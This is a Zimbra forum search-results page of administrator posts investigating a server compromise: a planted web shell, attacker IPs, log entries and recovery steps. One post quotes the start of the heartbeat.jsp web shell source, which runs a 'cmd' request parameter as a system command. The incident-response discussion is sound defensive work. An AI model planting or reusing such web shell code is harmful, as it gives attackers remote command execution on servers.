Search found 50 matches
- Thu Apr 06, 2023 8:38 am
- Forum: Administrators
- Topic: [SOLVED] The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....
- Replies: 42
- Views: 92444
Re: The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....
Hi all, we support dozens of Zimbra installations, most of them single server, some multi-server. 2 (that is "two") are running Zimbra 9.0, all others are on 8.8.15. The reason was already pointed out by Klug - our users are just not interested in the "modern UI" as it lacks soooo m...
- Tue Apr 04, 2023 4:40 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hi Chris,
thanx a lot for your feedback! I have updated the information in our Zimbra call. I pointed out that there is probably a risk for servers running P37 and p38. I have escalated this issue as much as I could.
Do you have - by any chance - serverlogs from Feb 12th?
Thanx and regards
Thomas
- Tue Apr 04, 2023 2:54 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
I am going to throw some stuff out there on the only server I have that isn't 0-trust. I have nginx logs back for 5 months on this server. % check_attacks.pl -logDir=`pwd` --search heartbeat [ 404] GET https://X.X.X.X/public/heartbeat.jsp Fuzz Faster U Fool v1.5.0 The above all happened on March 24...
- Tue Apr 04, 2023 2:31 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hello Thomas, The timestamp for heartbeat.jsp was 12th Feb. I have restored my mail server from a snapshot taken 16th Jan. I can confirm that heartbeat.jsp was not present and that the web interface works again. The version of Zimbra I have restored is Release 8.8.15_GA_3953.RHEL8_64_20200629025823...
- Tue Apr 04, 2023 12:51 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
My Zimbra is Release 8.8.15_GA_3953.RHEL8_64_20200629025823 UNKNOWN_64 FOSS edition, Patch 8.8.15_P38, running on fully patched AlmaLinux 8.7. The only ports allowed from the Internet are SMTP and HTTP/S. Pax is installed ([zimbra@mail ~]$ pax --version gives "spax: star 1.5.3 (x86_64-unknown-...
- Tue Apr 04, 2023 8:55 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
For the infected users, is it possible your exploit is related to the issue discussed here: https://forums.zimbra.org/viewtopic.php?t=71693 ? Not in my case. The server didn't have clamav installed. Posts to the forums describing unpatched exploits will not be approved. Hope that helps, Mark What d...
- Mon Apr 03, 2023 11:52 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Contents of the heartbeat.jsp file: <%@ page import="java.util.*,java.io.*"%><%%><%if (request.getParameter("cmd") != null) {Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C ...
- Mon Apr 03, 2023 11:35 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
The attacker's files are: - heartbeat.jsp - info.jsp - style.css In my case, the IP address of the attacker was 185.246.188.67 (it is on the abuse list). Do you know the timestamps of the files? On my server the heartbeat.jsp had a timestamp of Feb 12th. So the files were placed there some time ago. ...
- Mon Apr 03, 2023 9:21 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hi all, I found this in nginx.log. 185.246.188.73:45592 - - [31/Mar/2023:18:47:46 +0200] "POST https://192.168.0.1/public/heartbeat.jsp HTTP/1.1" 200 406 "-" "python-requests/2.25.1" The heartbeat.jsp was placed in /opt/zimbra/jetty/webapps/zimbra/public previously - b...
- Mon Apr 03, 2023 8:29 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hi all,
I opened a Zimbra case. Case No. is 01475766.
I suspect a zero day exploit - actively being exploited... I can only guess how many Zimbra servers out there are at severe risk...
Regards
Thomas